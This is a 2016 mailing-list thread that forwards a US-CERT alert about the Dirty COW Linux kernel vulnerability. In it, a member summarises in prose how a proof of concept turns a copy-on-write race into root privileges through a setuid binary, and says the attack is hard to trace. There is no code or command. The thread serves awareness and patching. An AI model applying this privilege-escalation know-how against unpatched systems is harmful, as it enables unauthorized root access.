Fwd: Linux Kernel Vulnerability

Jason Wright jason at thought.net
Sat Oct 22 20:09:23 CDT 2016


The particular POC we examined required the ability to read a setuid binary
(normally 4755 permissions, so allowed), write to the disk (/tmp would do),
and the ability to execute non-privileged system calls (madvise, open,
mmap, etc.).

The POC wrote arbitrary code to a file system cache page (normally mapped
R/O, copy on write, into a process). Instead of being COW, due to a race
condition, the cache page itself was overwritten. Now when the polluted
cache page belonging to the setuid binary is run, it runs the attacker
provided code... With the elevated privileges.

There are probably other ways to take advantage of the vulnerability, so
don't believe restrictions of any or all of the above form defense.

On Oct 21, 2016 4:56 PM, "Alex Fraser" <beatnic at comcast.net> wrote:

> That sounds like a cover story.  Could this exploit be used to gain access
> to Linus servers running Apache?
>
> BTW a DDOS attack made the news at noon on WUSA (old channel 9).  They
> said it was large and affected the East Coast of the United Snakes.
>
>
> RICHARD BARTH wrote on 10/21/2016 5:57 PM:
>
> According to one review I read, it was discovered some years ago and a fix
> prepared.
>
> It was dropped, though, because the fix caused problems with one of the
> IBM machines
>
> the software was commonly run on, and the bug wasn't considered to be a
> big one at
>
> the time.
>
>
> Dick
>
> On October 21, 2016 at 5:46 PM Jason Wright <jason at thought.net>
> <jason at thought.net> wrote:
>
> A friend and I spent some time looking at a proof of concept exploit of
> this vulnerability this afternoon. Nasty... Essentially it provides a pivot
> from unprivileged user to root by allowing the corruption of a cached page
> that is supposed to be read only (copy on write). It's pretty clever and
> because it doesn't corrupt the file on disk, not easily traceable.
>
> --Jason Wright
>
> On Oct 21, 2016 2:20 PM, "RICHARD BARTH" <w3hwn at comcast.net> wrote:
>
>
> ---------- Original Message ----------
> From: US-CERT <US-CERT at ncas.us-cert.gov>
> To: w3hwn at arrl.net
> Date: October 21, 2016 at 2:20 PM
> Subject: Linux Kernel Vulnerability
>
> [image: U.S. Department of Homeland Security US-CERT]
>
> National Cyber Awareness System:
>
>
> Linux Kernel Vulnerability
> <https://www.us-cert.gov/ncas/current-activity/2016/10/21/Linux-Kernel-Vulnerability>
> 10/21/2016 12:50 PM EDT
>
> Original release date: October 21, 2016
>
> US-CERT is aware of a Linux kernel vulnerability known as Dirty COW
> (CVE-2016-5195). Exploitation of this vulnerability may allow an attacker
> to take control of an affected system.
>
> US-CERT recommends that users and administrators review the Red Hat CVE
> Database <https://access.redhat.com/security/cve/cve-2016-5195>, the Canoical
> Ubuntu CVE Tracker
> <http://people.canonical.com/%7Eubuntu-security/cve/2016/CVE-2016-5195.html>,
> and CERT Vulnerability Note VU#243144
> <https://www.kb.cert.org/vuls/id/243144> for additional details, and
> refer to their Linux or Unix-based OS vendors for appropriate patches.
> ------------------------------
>
> This product is provided subject to this Notification
> <http://www.us-cert.gov/privacy/notification> and this Privacy & Use
> <http://www.us-cert.gov/privacy/> policy.
> ------------------------------
> A copy of this publication is available at www.us-cert.gov. If you need
> help or have questions, please send an email to info at us-cert.gov. Do not
> reply to this message since this email was sent from a notification-only
> address that is not monitored. To ensure you receive future US-CERT
> products, please add US-CERT at ncas.us-cert.gov to your address book.
> OTHER RESOURCES:
> Contact Us <http://www.us-cert.gov/contact-us/> | Security Publications
> <http://www.us-cert.gov/security-publications> | Alerts and Tips
> <http://www.us-cert.gov/ncas> | Related Resources
> <http://www.us-cert.gov/related-resources>
> STAY CONNECTED:
> [image: Sign up for email updates]
> <http://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>
>
> SUBSCRIBER SERVICES:
> Manage Preferences
> <http://public.govdelivery.com/accounts/USDHSUSCERT/subscribers/new?preferences=true>
>   |  Unsubscribe
> <https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/one_click_unsubscribe?verification=5.b03cc84c90ac58ffb6e970add416fb2d&destination=w3hwn%40arrl.net>
>   |  Help <https://subscriberhelp.govdelivery.com/>
> ------------------------------
> This email was sent to w3hwn at arrl.net using GovDelivery, on behalf of:
> United States Computer Emergency Readiness Team (US-CERT) · 245 Murray Lane
> SW Bldg 410 · Washington, DC 20598 · (888) 282-0870 [image: Powered by
> GovDelivery] <http://www.govdelivery.com/portals/powered-by>
>
>
> _______________________________________________
> Tacos mailing list
> Tacos at amrad.org
> https://lists.amrad.org/mailman/listinfo/tacos
>
> _______________________________________________
> Tacos mailing list
> Tacos at amrad.org
> https://lists.amrad.org/mailman/listinfo/tacos
>
>
>
> _______________________________________________
> Tacos mailing listTacos at amrad.orghttps://lists.amrad.org/mailman/listinfo/tacos
>
>
>
> --
>
>     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>        No electrons were harmed in the creation of this message
>          --------------------------------------------------------
>  ~~~******************* Alex Fraser *******************~~~
>          --------------------------------------------------------
> [[[[[[~~^^^#___=>>>```/\/\**O**/\/\```<<<=___#^^^~~]]]]]]
>
>
> _______________________________________________
> Tacos mailing list
> Tacos at amrad.org
> https://lists.amrad.org/mailman/listinfo/tacos
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.amrad.org/pipermail/tacos/attachments/20161022/c1c06e51/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: logo_gd_poweredby.gif
Type: image/gif
Size: 3495 bytes
Desc: not available
URL: <http://lists.amrad.org/pipermail/tacos/attachments/20161022/c1c06e51/attachment-0002.gif>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: us-cert-banner-700x100-2_original.png
Type: image/png
Size: 6427 bytes
Desc: not available
URL: <http://lists.amrad.org/pipermail/tacos/attachments/20161022/c1c06e51/attachment-0001.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: envelope.gif
Type: image/gif
Size: 596 bytes
Desc: not available
URL: <http://lists.amrad.org/pipermail/tacos/attachments/20161022/c1c06e51/attachment-0003.gif>


More information about the Tacos mailing list